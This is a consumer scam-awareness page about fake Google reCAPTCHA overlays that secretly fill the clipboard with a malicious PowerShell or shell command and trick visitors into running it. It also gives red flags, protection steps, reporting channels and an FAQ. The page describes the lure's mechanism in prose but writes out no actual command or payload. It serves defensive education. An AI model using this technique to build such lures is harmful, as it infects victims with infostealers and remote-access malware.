Fake Google reCAPTCHA Malware Scam
Fraudulent websites display a lookalike Google reCAPTCHA challenge and instruct visitors to paste a malicious command into their clipboard to 'verify they are human', silently installing malware on their device.
Part of: Fake CAPTCHA Malware Scams
Last reviewed: 8 June 2026
Google's reCAPTCHA is one of the most widely recognised security elements on the internet. Billions of users have clicked 'I am not a robot' or completed image-grid challenges, conditioning people to comply with reCAPTCHA prompts without question.
Criminals exploit this conditioned trust by creating fake verification overlays that mimic reCAPTCHA's appearance exactly — the Google logo, the tick-box, the recognisable branding. The twist is that instead of a normal image challenge, the fake CAPTCHA instructs the visitor to open the Windows Run dialog or macOS Terminal and paste a command 'to complete verification'.
The clipboard has already been silently loaded with a malicious PowerShell or shell command. When the victim pastes and runs it, the command downloads and executes malware, often an infostealer or remote access trojan, with no further interaction required.
How this scam works on the Google brand
Real Google reCAPTCHA challenges operate entirely within the browser — they never ask users to open external applications, paste commands, or interact with the operating system. The verification process is invisible to users most of the time, or at most requires clicking a checkbox or selecting images.
The scam typically appears when a victim visits a piracy site, a malicious ad redirect, or a compromised legitimate site. A full-screen overlay declares 'Verify you are human — Google reCAPTCHA required'. After the user clicks the checkbox, a second step appears: 'To complete verification, press Win+R, paste the following code, and press Enter'. The pasted command is a long Base64-encoded PowerShell string that silently fetches and runs a malware payload.
On macOS the instruction is adapted to open Spotlight or Terminal. The fake Google branding makes the entire sequence feel like a legitimate browser security measure rather than a social-engineering attack.
Common red flags
- A CAPTCHA asks you to open a system application such as Run, Terminal, or PowerShell — real reCAPTCHA never does this.
- You are told to paste something from your clipboard to 'complete verification' — this is not part of any legitimate browser check.
- The Google logo appears on a page you reached via an unexpected redirect or a suspicious-looking URL.
- The verification overlay fills the entire browser screen and cannot be closed.
- The URL in the address bar is not a known legitimate site, even though the reCAPTCHA branding looks authentic.
- After following the instruction your browser or system behaves unusually — high CPU, unexpected network activity.
How to protect yourself
- Never open Run, Terminal, or PowerShell at the instruction of a website — legitimate browser checks do not require this.
- Use an ad-blocking browser extension and a reputable DNS filter to reduce exposure to malicious redirect chains.
- If you pasted and ran a command, disconnect from the internet immediately, run a full malware scan, and change passwords for any accounts accessed on that device.
- Keep your operating system and browser up to date to limit the impact of any malware that does execute.
- Enable browser-based Safe Browsing protections in Chrome at Settings > Privacy and Security > Security > Enhanced protection.
- Use a standard user account rather than an administrator account for daily browsing to limit malware's system access.
How to report it
- Report the malicious URL to Google Safe Browsing at safebrowsing.google.com/safebrowsing/report_phish/.
- Submit the malware sample to VirusTotal at virustotal.com for broader community protection.
- Report to the FTC at ReportFraud.ftc.gov (US), Action Fraud actionfraud.police.uk (UK), or your national cybercrime unit.
- If the site appeared in a Google Search result, use the 'Report' option on that result.
Frequently asked questions
Does any legitimate website ever ask me to open Terminal or Run to pass a CAPTCHA?
No. No legitimate CAPTCHA service — including Google reCAPTCHA — ever asks you to open a command-line application or paste anything into it. Any site making this request is attempting to run malware on your device.
I pasted the command but did not press Enter. Am I safe?
Likely yes, as long as you did not execute the command. Close the terminal window without pressing Enter, clear your clipboard, and run a full antivirus scan as a precaution.
How do criminals get the malicious command into my clipboard silently?
Malicious JavaScript on the page uses the Clipboard API to overwrite your clipboard contents when you interact with the page — for example, when you click the fake checkbox. This happens invisibly in the background.